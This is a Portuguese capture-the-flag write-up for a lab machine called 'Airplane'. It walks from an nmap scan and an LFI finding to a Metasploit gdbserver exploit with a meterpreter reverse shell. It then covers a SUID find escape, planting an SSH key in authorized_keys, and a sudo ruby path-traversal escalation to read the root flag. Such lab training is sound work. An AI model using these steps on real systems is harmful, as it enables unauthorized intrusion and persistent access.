Airplane

PreviousPrivEsc NextPublisher

Last updated 10 months ago

Airplane

Classificação : Medium

Criador :

Ferramentas : Nmap, burpsuite, metasploit

Adicionar o dominio airplane.thm em /etc/hosts da nossa máquina

Enumeração

# nmap -sV -sV -p- -Pn 10.10.217.1 -oN scan
Starting Nmap 7.93 ( https://nmap.org ) at 2024-06-09 16:11 UTC
Nmap scan report for ip-10-10-217-1.eu-west-1.compute.internal (10.10.217.1)
Host is up (0.0046s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
6048/tcp open  x11?
8000/tcp open  http-alt Werkzeug/3.0.2 Python/3.8.10

Notamos que existe uma porta 8000 que pelos vistos indica um servidor web, visatamos a pagina web

O paramêtro page é vulneravel ao LFI

Após uma enumeração mais verbosa no servidor, encontramos o gdbserveruma aplicação bastante incomum rodando na porta 6048

Encontramos como explorar o gbserver no linux criando um binário elf com msfvenom ou como alternativa usar diretamente o metasploit

msf6 exploit(multi/gdb/gdb_server_exec) > show options 

Module options (exploit/multi/gdb/gdb_server_exec):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXE_FILE  /bin/true        no        The exe to spawn when gdbserver is not attached to a process.
   RHOSTS    10.10.89.58      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.
                                        html
   RPORT     6048             yes       The target port (TCP)


Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.10.43.74      yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   x86_64

Conseguimos acesso a máquina do alvo

msf6 exploit(multi/gdb/gdb_server_exec) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > shell 
Process 2617 created.
Channel 2 created.
/bin/bash -i
bash: cannot set terminal process group (2597): Inappropriate ioctl for device
bash: no job control in this shell
hudson@airplane:/opt$ id
id
uid=1001(hudson) gid=1001(hudson) groups=1001(hudson)

Após isso procuramos por binarios executáveis com o find

hudson@airplane:/home$ find / -user carlos -perm -u=s 2>/dev/null
find / -user carlos -perm -u=s 2>/dev/null
/usr/bin/find

Vamos procurar por find no getfobins

find . -exec /bin/sh -p \; -quit

Isso nos permitiu acessar os arquivos de outro usuário

udson@airplane:/home$ find . -exec /bin/sh -p \; -quit
find . -exec /bin/sh -p \; -quit
id
uid=1001(hudson) gid=1001(hudson) euid=1000(carlos) groups=1001(hudson)
ls
carlos
hudson
cd carlos
ls
                                ...SNIP...
Public
Templates
Videos
user.txt

Em nossa máquina, devemos gerar uma chave publica

root@ip-10-10-43-74:~# ssh-keygen

Enviar a chave publica criada na nossa maquina para a maquina do alvo

echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDE1VSJFDvp7dFK8iVJlc+zWYZzZaTrPAzg4DToqio4qGJCHM82kamTMbwmV9TXCxKPLiAaNgze6U5CaF9CJkC2jF+ltZJ4ivKP9cslZxz/UgptGJxDVTxtCi0VFqPq3ntw/E0mufIqPlWE4fTZ8JkgJ/MgKgbq0DeHuyMz2oUJxO4kYDrjpX7AN5ZU50Qq1taeL7yk/OufukgBCDD5v+PWn6+hgUYxGYMF0p2YbceVOfKkGxW8VM14cWVWy//HLQfZdHzFzlHvTVCk6cgOJfYj1IX+zZHqIM57ZmYkFGRgWhYEgrAQbvVcjmM+YDaV85X5fcSM8C3KA65TSzIobFRJ root@ip-10-10-43-74
' > /home/carlos/.ssh/authorized_keys

Iniciar uma sessão ssh com o usuario carlos

root@ip-10-10-43-74:~# ssh carlos@10.10.89.58
The authenticity of host '10.10.89.58 (10.10.89.58)' can't be established.
ECDSA key fingerprint is SHA256:RJRrbBrzRaN6WBmh5/0D/kOxpngC7XArEPxBegq5N20.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '10.10.89.58' (ECDSA) to the list of known hosts.
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-139-generic x86_64)

Expanded Security Maintenance for Applications is not enabled.
ubuntu.com/esm or run: sudo pro status

the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

carlos@airplane:~$ id
uid=1000(carlos) gid=1000(carlos) groups=1000(carlos),27(sudo)

Escalação de privilégios

carlos@airplane:~$ sudo -l
Matching Defaults entries for carlos on airplane:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User carlos may run the following commands on airplane:
    (ALL) NOPASSWD: /usr/bin/ruby /root/*.rb

Todos os arquivos com a extensão .rb podem ser executado como root então criamos um script para ler a flag

carlos@airplane:~$ cat script-root.rb 
puts File.read('/root/root.txt')
carlos@airplane:~$ sudo /usr/bin/ruby /root/../home/carlos/script-root.rb